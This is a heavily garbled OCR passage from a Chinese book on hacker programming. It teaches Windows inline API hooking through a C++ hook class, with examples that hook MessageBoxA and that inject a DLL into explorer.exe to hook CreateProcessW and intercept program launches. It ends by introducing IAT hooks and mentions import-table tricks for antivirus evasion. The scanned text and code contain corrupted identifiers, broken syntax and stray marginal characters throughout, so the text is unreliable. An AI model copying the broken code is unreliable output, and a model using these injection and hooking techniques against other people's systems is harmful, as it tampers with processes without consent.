2 注 : 该 偏 移 计 算 公 式 并 不 准确 ， 因 为 对 于 其 他 转移 指令 而 言 ， 其 指令 长 度 未 必 就 是 5 字 节 。 在 计算 短 转移 


上 面 的 例子 可 以 看 出 ， 修 改 时 只 需要 修改 5 字 节 就 可 以 了 。 下 面 来 梳理 Inline Hook 的 流程 ， 
具体 如 下 。 





Q@ 构造 跳 转 指令 

@ 在 内 存 中 找到 欲 HOOK 函数 地 址 ， 并 保存 欲 HOOK 位 置 处 的 前 5 字 节 

@@ 将 构造 的 跳 转 指令 写 入 需 HOOK 的 位 置 处 。 

外 当 被 HOOK 位 置 被 执行 时 会 转 到 自己 的 流程 执行 。 

@) 如 果 要 执行 原来 的 流程 ， 那 么 取消 HOOK， 也 就 是 还 原 被 修改 的 字 节 。 

@ 执行 原来 的 流程 。 

@ 继续 HOOK 住 原来 的 位 置 。 

这 就 是 Inline Hook 的 大 概 流 程 。 

由 于 Inline Hook 的 实现 代码 比较 简单 ， 关 键 就 是 一 个 HOOK 和 一 个 取消 HOOK 的 过 程 ， 


因此 可 用 C++ 封 装 一 个 Inline Hook 的 类 。 在 今后 Inline Hook 编程 中 ， 可 以 始终 使 用 这 个 封 
装 好 的 类 。 





一 般 情况 下 ， 封 装 类 都 有 两 个 文件 ， 一 个 是 类 的 头 文件 ， 另 一 个 是 类 的 实现 文件 。 在 


Windows 下 使 用 MFC 进行 开发 类 名 (Class Name) 都 习惯 以 “<C” 开 头 ， 这 里 封装 的 是 mline 
Hook 类 ， 因 此 类 名 是 CILHook。 为 了 保持 一 致 性 ， 类 的 头 文件 和 实现 文件 分 别 是 ILHook.h 
文件 和 ILHook.cpp 文件 。 先 来 看 一 下 ILHook.h 文件 中 的 类 定义 部 分 。 


#4Endesl TEHOOKRH, MABESel, D5 498E 923 808DCC9mA 人 TL 
#Qefine TLHOOK NH .FATBES8L 8D65 .49ef 923D -895DOGS8B4471.， 





#include <Windows.h> 


class CILHook 
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{ 


jbl oh 
CILHook() ; // 构造 第 
~CILHook() 7 /7 析 构 a 
Ee. 
// Hook 函数 齐 
BOOL Hook (LPSTR pszModuleName, // Hook 的 模块 名 称 
LPSTR pszFuncName, // Hook 的 API 函数 名 称 黑 
EROC pfnHookFunc); // 要 蔡 换 的 函数 地 址 客 
同 
Z/ 取消 HOOK 函数 FE 
VOID UnHook(); 的 
// 重新 进行 Hook 函数 古 
BOOL ReHook(); O 
入 
private: 技 
RROCI | mbANOPYg // 函数 地 址 术 
BYTE m boldBytes[5]; 1/ 函数 入 口 代码 
BYTE m bNewBytes[5]; /7 Inline 代 码 
hn 
#endif 


在 C++ 中 ， 类 的 定义 使 用 关键 字 “class”。 在 类 中 定义 有 成 员 函 数 和 成 员 变 量 ,， 通常 情况 
下 ， 把 成 员 函 数 放 在 上 面 ， 把 成 员 变 量 放 在 下 面 。 因 为 对 于 拿 到 头 文件 的 使 用 人 员 来 说 ， 他 
首先 关注 的 是 类 实现 了 哪些 功能 ， 因 此 应 该 让 他 第 一 眼 就 能 看 到 实现 了 的 成 员 函 数 。 当 然 ， 
这 不 是 必需 的 ， 只 是 一 种 习惯 。 

回 到 类 定义 ， 在 类 中 除了 构造 函数 和 析 构 函数 以 外 ， 还 定义 了 3 个 成 员 函 数 ， 分 别 是 
Hook()、UnHook() 和 ReHook()。 它 们 的 功能 分 别 是 用 来 进行 HOOK 操作 、 取 消 HOOK 操作 和 
重新 进行 HOOK 操作 。 对 于 3 个 成 员 函 数 来 说 , 这 里 只 是 一 个 定义 , 实现 部 分 在 ILHook.cpp 中 。 

除了 上 面 的 3 个 成 员 函 数 外 ， 还 定义 了 3 个 成 员 变 量 , 分 别 是 m_pfnOrig、m EpOtdytenl] 
和 m_bNewBytes[5]。 这 3 个 函数 的 作用 已 经 在 定义 中 给 出 了 注释 ， 想 必 读 者 应 该 能 明白 ， 这 
里 就 不 具体 说 了 。 接 着 看 ILHook.cpp 文件 中 的 实现 代码 ， 具 体 如 下 : 


ciLHook: :CILHook'() 


{ 
// 对 成 员 变量 的 初始 化 
m pfnOorig = NULL; 
ZeroMemory (m boOldBytes, 5); 
ZeroMemory (m bNewBytes, 5); 





} 


CILHOOK: "~CLILHOOK () 
{ 
// 取消 HOOK 
UnHook(); 


m pfnOrig = NULL; 
ZeroMemory (m boOldBytes, 5)» 
ZeroMemory (m bNewBytes, 5); 


) 
在 构造 函数 中 主要 是 完成 对 成 员 变 量 的 初始 化 工作 ， 在 析 构 函数 中 主要 是 取消 HOOK。 
TE a i er 


负数 名 称 : Hook 
人 对 指定 模块 中 的 函数 进行 挂 钧 


参 





pszModuleName :模块 名 称 
pszFuncName: 函数 名 称 
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pfnHookFunc:。 钩子 函数 
0 
BOOL CILHooOk: :HooOk (LPSTR pszModuleName, 
LPSTR pszFuncName, 
PROC pfnHookFunc) 


BOOL bRet = FALSE; 


// 获取 指定 模块 中 函数 的 地 址 

m pfnorig = (PROC) GetProcAddress!\ 
GetModuleHandle (pszModuleName),; 
pszFuncName); 


LF (0 mEnorLg da NULL) 


{ 
// 保存 该 地 址 处 5 字 节 的 内 容 
DWORD GwNum = 0; 


ReadProcessMemory (GetCurrentProcess (), 


m pfnOorig, 
m boldBytes, 
5 
&AWNUum) : 
// 构造 JME 指令 
m bNewBytes[0] = '\xe9'; // jmp Opcode 


// pfnHookFunc 是 HOOK 后 的 目标 地 址 

// m pfnorig 是 原来 的 地 址 

// 5 是 指令 长 度 

*(DWORD *) (m_bNewBytes + 1) = (DWORD)pfnHookFunc - (DWORD)m pfnOrig 一 5; 


// 将 构造 好 的 地 址 写 入 该 地 址 处 
WriteProcessMemory (GetCurrentProcess (), 
m pfnOrig, 
m bNewBytes, 
5, 
&AdwNum); 


bpRet = "TRUE? 
} 


return bRet; 


} 
该 函数 是 InlineHook 类 的 重要 函数 。 在 Hook() 成 员 函 数 中 完成 了 3 项 工作 ， 首先 是 获得 


了 被 HOOK 函数 的 函数 地 址 ， 接 下 来 是 保存 了 被 HOOK 函数 的 前 5 字 节 ， 最 后 是 用 构造 好 
的 跳 转 指令 来 修改 被 HOOK 函数 的 前 5 字 节 的 内 容 。 
除了 上 面 的 函数 外 ,还 有 两 个 函数 ， 分 别 是 取消 挂钩 和 重新 挂钩 。 这 两 个 函数 非常 简单 ， 


就 是 完成 复制 字 节 的 工作 。 代 码 如 下 : 
/* 
函数 名 称 : UnHook 
函数 功能 ;取消 函数 的 挂钩 
a 


VOID CILHook: :UnHook'() 
{ 
if£ ( m pfnOorig != 0 ) 
{ 
DWORD dwNum = 0; 
WriteProcessMemory (GetCurrentProcess(), 
m pfnOrig, 
m boOldBytes, 
5, 
&GwNUm) 7 
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} 


A 第 
函数 名 称 : ReHook 0 7 
函数 功能 : 重新 对 函数 进行 挂钩 章 
«hf 
BOOEL CILHook: :ReHook() 
{ 黑 
BOOL bRet = FALSE; 客 
疝 
i { m penorig = 0 ) 手 
的 
DWORD dwNum = 0; 工 
WriteProcessMemory (GetCurrentProcess(), (> 
m pfnOorig, OO 
m bNewBytes, 天 
5, 技 
&dwNum) : 术 
bRet = TRUE; 
} 
| 


return bRet; 


} 

上 面 两 个 成 员 函 数 就 不 进行 介绍 了 ， 只 要 读者 能 看 懂 Hook() 函 数 的 实现 ， 就 肯定 能 理解 
这 两 个 函数 的 功能 。 

整个 Inline Hook 的 封装 已 经 完成 了 ， 在 后 面 的 代码 中 ， 可 以 很 容易 地 实现 对 函数 的 
HOOK 功能 。 


7.2.3 Inline Hook 实例 


在 介绍 完 Inline Hook 的 原理 和 实现 以 后 ， 接 下 来 介绍 两 个 Inline Hook 的 实例 ， 分 别 是 
对 本 进程 进行 HOOK 和 对 其 他 进程 进行 HOOK 的 实例 。 

1. Hook MessageBoxA 函数 

本 小 节 将 完成 一 个 HOOK 本 进程 MessageBoxA0 的 程序 ， 这 个 程序 的 目的 是 测试 类 是 否 
封装 成 功 ， 以 便 完 成 今后 的 程序 。 在 VC6 下 创建 一 个 控制 台 程 序 ， 添 加 好 封装 过 的 库 ， 然 后 
键入 下 面 的 代码 : 


#include <Windows.h> 
#include "ILHook.h" 


// 创建 一 个 全 局 的 变量 
CILHook MsgHook; 


int 

WINAPI 

MyMessageBoxaA!l 
HWND hWnd, 
LPCSTR lpText, 
LPCSTR lpCaption;, 
UINT uType) 

{ 

// 恢复 HOOK 


MsgHook.UnHook(); 

MessageBox (hWnd，"Hook 流程 "， lpCaption, UType); 
MessageBox (hWnd, lpText, lpCaption, uType}); 

// 重新 HOOK 

MsgHook .ReHook (); 





retuirn O03 | 
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中 


} 


int main() 
{ 
// 不 进行 HOOK 的 MessageBox 
MessageBox (NULL， "正常 流程 1"， "test"，MB_ORK) ， 


// HOOK 后 的 MessageBox 

MsgHook.Hook ("User32.d11”, "MessageBoxA”, (PROC)MyMessageBoxA); 
MessageBox (NULL, "被 HOOK 了 1",， "test", MB OK) 

MessageBox (NULL, "被 HOOK 了 2", "test", MB_OK); 

MsgHook.UnHook ()» 


MessageBox (NULL，" 正 常 流程 2",， "test",， MB_OK); 


return 07 


在 主 函 数 中 调用 了 4 次 MessageBox() 函 数 ， 每 次 弹出 的 内 容 分 别 是 “正常 流程 1”“ 被 
HOOK 了 1”“ 被 HOOK 了 2” 和 “正常 流程 2”。 在 MyMessageBoxA() 函 数 中 ， 分 别 调用 两 
次 MessageBox 函数 ， 并 且 分 别 输出 “Hook 流程 ”和 MyMessageBoxA() 函 数 的 参数 。 

从 主 函 数 的 流程 结构 来 看 ， 并 没有 调用 自己 实现 的 MyMessageBoxA( 函 数 。 编译 连接 并 
运行 自己 的 程序 ， 从 程序 的 执行 结果 来 看 ， 一 共 出 现 了 6 次 由 MessageBox() 函 数 产 生 的 对 话 
框 。 这 说 明 Inline Hook 完成 了 。 


Dp 注 : 在 自己 实现 的 Hook 函数 中 要 调用 原来 的 AP| 函数 ， 需 要 恢复 Inline Hook， 和 否则 将 是 一 个 死 循 环 。 比 

如 自己 实现 的 MyMessageBoxA() 是 用 来 HOOK MessageBoxA() 函 数 的 ， 在 MyMessageBoxA() 中 调用 
MessageBoxA() 函 数 时 ， 需 要 恢复 MessageBoxA() 不 被 Hook， 否 则 对 MessageBoxA() 函 数 的 调用 一 直 会 
进入 MyMessageBoxA() 函 数 而 无 法 弹出 对 话 框 。 


这 里 介绍 了 关于 本 进程 的 Inline Hook 的 例子 ， 接 下 来 要 介绍 的 是 其 他 进程 Inline Hook 
的 例子 。 由 于 每 个 进程 的 地 址 空间 是 隔离 的 ， 那 么 其 他 进程 的 Inline Hook 是 需要 用 到 DLL 
文件 的 。 下 面 介绍 如 何 使 用 DLL 文件 来 完成 对 其 他 进程 的 Inline Hook 的 工作 。 

2. Hook CreateProcessW 函数 

在 这 个 例子 中 ， 先 写 一 个 DLL， 然 后 通过 DLL 来 HOOK CreateProcessW() 函 数 。 在 
Windows 下 ， 大 部 分 应 用 程序 都 是 由 Explorer.exe 进程 来 创建 的 。 这 里 用 “Process Explorer” 
工具 来 查看 一 下 ， 如 图 7-6 所 示 。 


Sa ex 






51 人 安 时 保护 模 堪 


图 7-6 用 “Process Explorer” 查 看 应 用 程序 的 父 进程 


“IPraarani 


从 图 7-6 中 可 以 看 出 ， 大 部 分 应 用 程序 都 是 由 Explorer.exe 进程 创建 的 ， 那 么 只 要 把 
Explorer.exe 进程 的 CreateProcessW0O 函 数 HOOK 住 ,就 可 以 针对 要 完成 的 工作 做 很 多 事情 了 。 
比如 ， 可 以 记录 哪个 应 用 程序 被 启动 ， 也 可 以 对 应 用 程序 进程 进行 拦截 。 

这 里 的 例子 就 是 通过 HOOK CreateProcessW() 函 数 来 显示 被 创建 的 进程 名 。 还 是 使 用 前 





| 
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面 给 出 的 ILHook 类 来 进行 HOOK 工作 。 创 建 一 个 DLL 的 VC 工程 ， 代 码 如 下 : 


#include "ILHooKk.h" 


CILHook CreateProcessHooks; 


// 实 现 的 Heck 函数 
BOOL, 
WINRAPTI 
MyCreateProcessW!( 
LPCWSTR lpApplicationName, 
LPWSTR lpCommandLine, 
LPSECURITY ATTRIBUTES lpProcessAttributes, 
LPSECURITY ATTRIBUTES lpThreadAttributes, 
BOOL bInheritHandles, 
DWORD dwCreationFlags, 
LPVOID lpEnvironment, 
LPCWSTR lpCurrentDirectory, 
LPSTARTUPINFOW lpStartupInfo, 
LPPROCESS._ INFORMATION lpProcessInformation 
) 


半 洲 MOOH 事 川 囊 呐 省 地、 中 N 
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BOOL bRet = FALSE; 


CreatePprocessHook. UnHook () : 
// 弹出 被 创建 的 进程 名 
MessageBoxW (NULL, lpApplicationName, lpCommandLine, MB OK) 


// 创建 进程 

bRet = CreateProcessW(1lpApplicationName, 
lpCommandLine, 
lpProcessAttributes, 
lpThreadAttributes, 
bInheritHandles, 
dwCreationFlags, 
lpEnvironment, 
lpCurrentDirectory, 
lpStartupInfo, 
lpProcesslinformation),; 


CreateProcessHook. ReHook (); 


return bRet; 
} 


BOOL APIENTRY DlliMain( HANDLE hModule, 
DWORD ul reason for call, 
LPVOID lpReserved 
) 


Switch ( ul reason for call ) 
{ 
Case DLL_ PROCESS ATTACH: 
// Hook CreateProcessW'() 函数 
CreateProcessHook.Hook ("kernel32.d11", 
"CreatePprocessW", 
(PROC) MyCreateProcessW); 
break; 
W 
case DLL PROCESS DETACH: 
{ 
CreateProcessHook.UnHook (); 
break; 
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return TRUE? 


} 

代码 不 是 很 长 ，Hook 功能 是 由 前 面 封装 过 的 类 来 完成 的 ， 只 要 使 用 封装 好 的 类 进行 
HOOK, 并 定义 一 个 Hook 函数 就 可 以 了 。 将 这 段 代 码 编译 连接 , 然后 用 第 3 章 中 编写 的 DLL 
注入 工具 将 这 个 DLL 文件 注入 explorer.exe 中 ， 如 图 7-7 所 示 。 

将 这 个 DLL 注入 Explorer.exe 进程 后 ， 运 行 一 下 IE 浏览 器 ， 会 弹出 一 个 对 话 框 ， 如 
图 7-8 所 示 。 


有 | 


最 全 所 | [二 | 


图 7-7 用 DLL 注入 工具 注入 HOOK DLL 图 7-8 对话 框 标题 栏 上 显示 了 被 创建 的 进程 名 





ze DH 注 入 /种 蔓 器 





“C:\Program Files\internet ExpiorerViEXRIOHEERE 和 





单 击 “ 确 定 ” 按 钮 后 ， 卫 浏览 器 被 打开 。 再 打开 记事 本 、 画 图 、 计 算 器 等 程序 ， 都 成 功 
地 显示 出 其 进程 名 及 进程 的 路 径 。 

把 这 个 程序 修改 一 下 ， 让 它 可 以 拦截 进程 的 创建 ， 这 样 来 达到 对 创建 应 用 程序 的 管控 。 
修改 的 方法 很 简单 ， 弹 出 对 话 框 以 后 ,对 话 框 上 有 两 个 按钮 , 分 别 选择 相应 的 按钮 就 可 以 了 。 
修改 后 的 代码 如 下 : 


BOOL 

WINAPI 

MyCreateProcessW!( 
LPCWSTR lpApplicationName, 
LEWSTR lpCommandLine, 
LPSECURITY ATTRIBUTES lpProcessAttributes, 
LPESECURITY ATTRIBUTES lpThreadAttributes, 
BOOL biInheritHandles, 
DWORD dwCreationFlags, 
LPVOID lpEnvironment, 
LPEWSTR lpCurrentDirectory, 
LPSTARTUPINFOW lpStartupInfo, 
LPPROCESS_INFORMATION lpProcessInformation 
y 


BOOL bRet = FALSE; 


if ( MessageBoxW(NULL, lpApplicationName, lpCommandLine, MB YESNO) == IDYES 
{ 


CreateProcessHook .UnHook(); 
bRet = CreateProcessW (lpApplicationName, 
lpCommandLine, 
lpProcessAttripbutes, 
lpThreadAttributes, 
binheritHandles, 
dwCreationFlags, 
lpEnvironment, 
lpCurrentDirectory, 
lpSstartupInfo, 
lpProcessinformation)’; 
CreateProcessHook.ReHook (); 
} 
else 


{ 
MessageBox (NULL, "您 启动 的 程序 被 拦截 "，" 提 示 "，MB_OK); 
} 
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return bRet; 
} 


编译 连接 这 个 程序 ,提示 连接 错误 。 原因 是 刚才 编译 连接 的 DLL 文件 正在 被 使 用 ， 所 以 
无 法 对 其 修改 。 用 DLL 注入 工具 将 刚才 的 DLL 进行 扼 载 , 然后 再 次 编译 连接 , 这 次 就 通过 了 。 
把 新 生成 的 DLL 文件 再 次 注入 Explorerexe 进程 中 ， 然 后 启动 记事 本 程序 ， 如 图 7-9 所 示 。 

单 击 “ 是 ”按钮 ， 那 么 记事 本 程序 被 创建 。 如 果 单 击 “ 否 ”按钮 ， 那 么 会 提示 “您 启动 
的 程序 被 拦截 *”， 并 且 记 事 本 程序 没有 被 打开 。 单 击 “ 否 ”按钮 ， 效 果 如 图 7-10 所 示 。 


C\WINDOWS \system32\notepad xe 





图 7-9 是 否 创建 进程 的 提示 框 图 7-10 进程 创建 被 拦截 的 提示 


出 现 提 示 框 ， 单 击 “ 确 定 ” 按 钮 以 后 ， 记 事 本 程序 没有 被 打开 。 再 对 正 浏览 器 、 计 算 器 、 
画图 等 程序 进行 测试 。 测 试 的 结果 都 和 记事 本 程序 的 结果 是 一 样 的 ， 说 明 对 应 用 程序 创建 的 
拦截 功能 已 经 成 功 。 

该 例子 程序 完成 了 对 其 他 进程 的 Inline Hook 的 操作 ， 关 于 Inline Hook 的 内 容 还 有 一 部 
分 需要 进行 介绍 。 


7.2.4 7 字 节 的 Inline Hook 


在 前 面 的 内 容 中 读者 已 经 知道 ， 在 做 Inline Hook 的 时 候 是 通过 构造 一 个 jmp 指令 来 修 
改 目 标 函 数 入 口 的 字 节 内 容 。 在 构造 jmp 指令 时 唯一 比较 不 好 理解 的 可 能 是 计算 jmp 指令 
后 面 的 偏 移 量 ， 这 是 由 于 CPU 机 器 码 要 求 jmp 指令 后 是 一 个 偏 移 量 。 既 然 是 修改 目标 函数 
入 口 的 指令 ， 那 么 可 以 多 修改 几 条 指令 ， 从 而 达到 不 计算 jmp 指令 的 跳 转 偏 移 量 来 完成 
Inline Hook 的 功能 。 

不 通过 计算 jmp 指令 后 的 偏 移 量 来 完成 Inline Hook 的 功能 , 需要 使 用 与 其 等 价 的 指令 来 
完成 。 在 这 里 修改 函数 的 入 口 的 两 条 指令 来 完成 mline Hook， 一 条 是 把 目标 地 址 存 入 寄存 器 
eax 中 ， 然 后 用 jmp 指令 直接 跳 转 到 寄存 器 eax 中 保存 的 地 址 处 ， 代 码 如 下 : 


mov eax, 12345678 
jmp eax 


用 OD 随便 打开 一 个 程序 , 然后 修改 其 入 口 代码 为 上 述 代码 , 再 提取 其 机 器 码 ， 如 图 7-11 
所 示 。 


BO4O1835 | FF 


E | 


OOHgi838| .98 
G64 和 4939| 99 nop 
B8301838 | . 68 CO554898 |push B84855C8 





图 7-11 修改 入 口 代码 


从 图 7-11 中 可 以 看 出 ，mov eax, 12345678 对 应 的 机 器 码 为 B8 78 56 34 12， 也 就 是 说 ， 
B8 是 mov 指令 的 机 器 码 。 再 看 一 下 jmp eax， 其 对 应 的 机 器 码 为 FF E0。 看 过 mov eax, 12345678 / 
jmp eax 对 应 的 机 器 指令 以 后 就 会 明白 ，mov 指令 的 机 器 码 是 不 变 的 ，jmp eax 指令 的 机 器 码 也 
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是 不 变 的 ， 变 化 的 只 有 地 址 ， 而 这 里 的 地 址 可 以 根据 Hook 的 蔡 换 函数 直接 给 出 而 不 需要 进 
行 计算 。 将 其 定义 为 一 个 字 节 数组 : 


3 et (A DV A TD C2 2 PA ow IE 

这 样 定 义 以 后 ， 只 要 把 目标 函数 的 地 址 保存 在 从 第 一 至 四 字 节 的 位 置 就 可 以 了 《下 标 
是 从 0 开始 的 )。 通 过 这 种 方法 ， 就 不 用 再 计算 jmp 要 跳 转 的 位 置 对 应 的 偏 移 量 了 。 这 也 是 
一 种 进行 mline Hook 的 方法 ， 不 过 同样 都 是 修改 目标 函数 的 入 口 ， 只 是 替换 的 字 节 数量 的 
多 少 问 题 。 


7.2.5 Inline Hook 的 注意 事项 


在 写 Hook 函数 时 一 定 要 注意 函数 的 调用 约定 ， 函 数 的 调用 约定 决定 了 函数 调用 传递 参 
数 的 顺序 和 函数 调用 后 负责 平衡 栈 的 一 种 约定 。 如 果 在 调用 函数 后 栈 不 恢复 到 调用 前 的 样子 
的 话 ， 那 么 程序 后 续 的 部 分 一 定 会 报错 。 程 序 短 可 能 会 不 报错 ， 但 是 千 万 不 要 有 这 样 侥幸 的 
心理 。 

下 面 用 HOOK 本 进程 的 例子 做 一 个 简单 的 修改 ， 演 示 一 下 调用 。 

HOOK 的 是 MessageBoxA0 函 数 ， 该 函数 有 4 个 参数 ， 用 户 定义 的 函数 也 一 定 要 是 4 个 
参数 。MessageBoxA0 函 数 的 调用 约定 是 _stdcall， 那 么 定义 函数 时 也 要 使 用 ”stdcall。 定 义 
时 使 用 的 是 WINAPI， 这 是 一 个 宏 ， 其 定义 如 下 : 


#define WINAPI __ stdcall 


在 MSDN 中 看 一 下 MessageBox0 的 函数 定义 ， 有 具体 如 下 : 


int MessageBox( 





HWND hWnd, // 窗口 的 句柄 
LECTSTR lpText, // 消息 框 中 的 文本 
LPCTSTR lpCaption, // 消息 框 标题 
UINT uType /7 消息 框 风格 


) 7 
在 MSDN 中 并 没有 看 到 对 MessageBox() 函 数 有 关于 调用 约定 方面 的 修饰 。 在 WinUser.h 
中 看 一 下 关于 MessageBoxA() 函 数 的 定义 ， 具 体 如 下 : 


WINUSERAPI 

int 

WINAPI 

MessageBoxaAl( 
HWND hwnd ， 
LPCSTR lpText, 
LPCSTR lpCaption, 
UINT uType); 


在 WinUserh 头 文件 中 可 以 看 到 ， 在 定义 中 使 用 了 WINAPI 函数 调用 约定 的 修饰 。 现 在 
来 修改 一 下 代码 ， 修 改 后 的 代码 如 下 : 


int 

/*WINAPI*/ 

MyMessageBoxA!( 
HWND hwnd, 
LPCSTR 4pTexts 
LPCSTR lpCaption, 
UINT uType) 


/7 恢复 HOOK 

MsgHook.UnHook(); 

MessageBox (hWnd，"Hook 流程 "，1lpCaption, uType); 
MessageBox (hWnd, lpText, lpCaption, uType); 

// 重新 HOOK 

MsgHook.ReHook (); 








7.2 ”内 联 钧 子 一 一 Inline Hook 





retarnil0y 


} 
从 代码 中 可 以 看 到 ， 这 里 把 WINAPI 函数 调用 约定 的 宏 注 释 掉 了 。 将 程序 进行 编译 连接 


并 运行 。 运行 后 看 到 了 MessageBox() 的 对 话 框 , 但 是 最 后 却 出 现 了 报错 ， 如 图 7-12 和 图 7-13 
所 示 。 






@: Debug Errorr | 
ete E: WE a | 
Fe: en ; 





We ia Ae A od a a 


(Press Retry to debig the applcation) 





图 7-12 错误 对 话 框 图 7-13 错误 对 话 框 





在 出 现 图 7-12 后 ， 单 击 “ 和 忽略” 按钮 ， 会 弹出 如 图 7-13 所 示 的 错误 提示 。 从 图 7-13 中 
可 以 看 到 一 个 提示 “File:i386\chkesp.c”。 看 到 这 个 提示 以 后 首先 要 知道 ， 这 是 VC 的 Debug 
编译 版 本 在 检查 栈 平衡 时 报 的 错误 。 虽 然 这 个 代码 是 系统 的 代码 ， 不 是 自己 写 的 代码 ， 但 是 
在 系统 检查 栈 时 报错 ， 多 半 是 由 于 代码 破坏 了 栈 的 平衡 。 因 此 ， 要 检查 自己 的 代码 ， 而 不 是 
怀疑 系统 提供 的 代码 有 问题 。 
出 现 这 个 错误 时 ， 其 实 很 多 人 是 知道 原因 的 ， 是 因为 把 WINAPI 函数 调用 约定 的 修饰 去 
掉 了 。 因 此 ， 的 确 是 要 检查 自己 的 代码 。 但 是 应 该 从 哪里 开始 着 手 呢 ? 修改 调用 约定 以 后 ， 
栈 会 不 平衡 。 使 用 _stdcall 是 在 被 调用 函数 内 进行 平 栈 ， 而 VC 默认 的 调用 约定 是 _cdcel， 
此 种 调用 约定 是 由 调用 方 进 行 平 栈 。 那 么 ， 用 户 就 要 手动 进行 平 栈 了 。 
MessageBoxA0 函 数 有 4 个 参数 ， 每 个 参数 占用 4 字 节 ， 那 么 自己 在 函数 中 进行 平 栈 ， 
只 要 在 返回 时 调用 ret 0x10 就 可 以 了 。 修 改 的 代码 如 下 : 
ed 
MyMessageBoxAl( 
HWND hwnd, 
LPCSTR LpText., 


EPCSTR LpCaption, 
UINT uType) 








/7 恢复 HOOK 

MsgHook ,UnHook (); 

MessageBox (hWnd，"Hook 流程 "，1lpCaption, uType); 
MessageBox (hWnd, lpText, lpCaption, uType); 

// 重新 HOOK 

MsgHook.ReHook (); 


ret Ox10 


编译 连接 ， 并 运行 ， 仍 然 提 示 有 和 错误。 看 来 要 进行 更 进一步 的 调试 了 。 在 MsgHook. 
UnHookO 位 置 处 按 F9 键 设置 断 点 ， 如 图 7-14 所 示 。 
按 F5 键 执行 代码 ， 运 行 到 断 点 处 。 单 击 工具 栏 上 的 反 汇 编 按钮 ， 如 图 7-15 所 示 。 
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| | MMessageBoxf( 
> HWND hWnd, 

Wa LPCSTR ipText, 
ud LPCSTR Tncaptions 
: UINT uvuType) 
1/ 恢复 Ho0k 
MsaHook - A 

MessageBoxkhimd，"Hook 流 程 "，ipCaption，uTUpe); 
Ness. i lpTlext, lpCaption, uType); 
1 


HsgHook .ReHook(); 


图 7-14 在 MsgHook.UnHook() 位 置 处 设置 断 点 图 7-15 反 汇 编 按 钮 


将 代码 窗口 往 上 移动 ， 到 函数 的 定义 处 ， 如 图 7-16 所 示 。 


LPCSTR lpText, 
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图 7-16 函数 定义 处 的 反 汇 编 代码 


通过 反 汇 编 看 到 有 几 条 修改 栈 的 操作 ,分别 是 push ebp、sub esp, 40h、 push ebx、 push esi、 
push edi 这 5 条 代码 。 根 据 这 5 条 代码 来 修改 自己 的 代码 ， 以 保证 栈 的 平衡 。 按 F7 键 停止 调 
试 状态 的 程序 ， 并 修改 代码 ， 修 改 后 的 代码 如 下 : 


7.3 ”导入 地 址 表 钧 子 一 一 IAT HOOK 





将 该 代码 编译 连接 并 运行 ， 这 次 运行 正常 了 。 

以 上 演示 了 一 次 手动 平衡 栈 的 过 程 ， 是 不 是 很 麻烦 ? 其 实 对 汇编 熟悉 的 话 就 不 麻烦 了 。 
不 过 笔者 个 人 觉得 即使 不 麻烦 ， 也 要 按照 原 函 数 的 定义 来 定义 HOOK 函数 ,以 避免 不 必要 的 
麻烦 。 在 学 习 的 过 程 中 ， 为 了 深入 地 学 习 和 掌握 知识 ， 手 动 平衡 栈 是 可 以 的 。 但 是 在 实际 编 
程 的 过 程 中 ， 若 仍然 使 用 手动 进行 栈 的 平衡 ， 那 就 钻 牛 角 尖 了 。 

本 节 介 绍 了 Inline HOOK 的 原理 ， 并 通过 两 个 例子 介绍 了 Inline Hook 的 用 法 。 一 个 例子 
是 对 本 进程 的 HOOK， 男 一 个 例子 是 对 其 他 进程 的 HOOK。 在 对 其 他 进程 HOOK 中 ， 演 示 
了 如 何 HOOK CreateProcessW() 函 数 ， 并 且 从 中 介绍 了 拦截 应 用 程序 进程 被 创建 的 过 程 ， 又 
强调 了 对 函数 栈 平衡 的 重要 性 。 在 接 下 来 的 HOOK 讲解 中 ， 将 介绍 IAT HOOK。 


7.3 ”导入 地 址 表 钩 子 一 一 IAT HOOK 


导入 地 址 表 是 PE 文件 结构 中 的 一 个 表 结构 。 在 介绍 PE 文件 结构 的 时 候 虽然 没有 提 到 导入 
地 址 表 ， 但 是 提 到 了 数据 目录 。 数 据 目 录 在 IMAGE OPTIONAL HEADER 中 的 DataDirectory 
中 ， 下 面 回忆 一 下 它 的 定义 : 

/i 


typedef struct _ IMAGE OPTTIONAL HEADER 1{ 
// 
// 标准 字段 
/7 


senses 


DWORD NumberOfRvaAndSizes; 
IMAGE DATA DIRECTORY DataDirectory[IMAGE NUMBEROF DIRECTORY ENTRIES]; 
} IMAGE OPTIONAL HEADER32, *PIMAGE OPTIONAL HEADER32; 


NumberOfRvaAndSizes: 该 字段 表示 数据 目录 的 个 数 ， 该 个 数 的 定义 为 16， 有 具体 如 下 : 


#define IMAGE NUMBEROF DIRECTORY ENTRIES 16 

DataDirectory: 数据 目录 表 ， 由 NumberOfRvaAndSize 个 IMAGE DATA DIRECTORY 
结构 体 组 成 。 该 数组 包含 输入 表 、 输 出 表 、 资 源 等 数据 的 RVA。IMAGE DATA_DIRECTORY 
的 定义 如 下 : 

ep 

// 目录 格式 

ji 

typedef struct _IMAGE DATA DIRECTORY { 

DWORD VirtualAddress; 


DWORD Sizey 
} IMAGE DATA DIRECTORY, *PIMAGE DATA DIRECTORY; 


该 结构 体 的 第 一 个 变量 为 该 目录 的 相对 虚拟 地 址 的 起 始 值 ， 第 二 个 是 该 目录 的 长 度 。 导 
入 表 就 由 数据 目录 中 的 某 项 给 出 。 
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7.3.1 导入 表 简 介 


在 可 执行 文件 中 使 用 其 他 DLL 可 执行 文件 的 代码 或 数据 ， 称 为 导入 或 者 输入 。 当 PE 
文件 需要 运行 时 ， 将 被 系统 加 载 至 内 存 中 ， 此 时 Windows 加 载 器 会 定位 所 有 的 导入 的 函数 
或 数据 将 定位 到 的 内 容 填写 至 可 执行 文件 的 某 个 位 置 供 其 使 用 。 这 个 定位 是 需要 借助 于 可 
执行 文件 的 导入 表 来 完成 的 。 导入 表 中 存放 了 所 使 用 的 DLL 的 模块 名 称 及 导入 的 函数 名 称 
或 函数 序号 。 

在 加 壳 与 脱 壳 的 研究 中 ， 导 入 表 是 非常 关键 的 部 分 。 加 壳 要 尽 可 能 地 隐藏 或 破坏 原始 的 
导入 表 。 脱 壳 一 定 要 找到 或 者 还 原 或 者 重建 原始 的 导入 表 ， 如 果 无 法 还 原 或 修复 脱 壳 后 的 导 
入 表 的 话 ， 那 么 可 执行 文件 仍然 是 无 法 运行 的 。 

在 免 杀 中 也 有 与 导入 表 相 关 的 内 容 ， 比 如 移动 导入 表 函 数 、 修 改 导 入 表 描 述 信息 、 隐 藏 
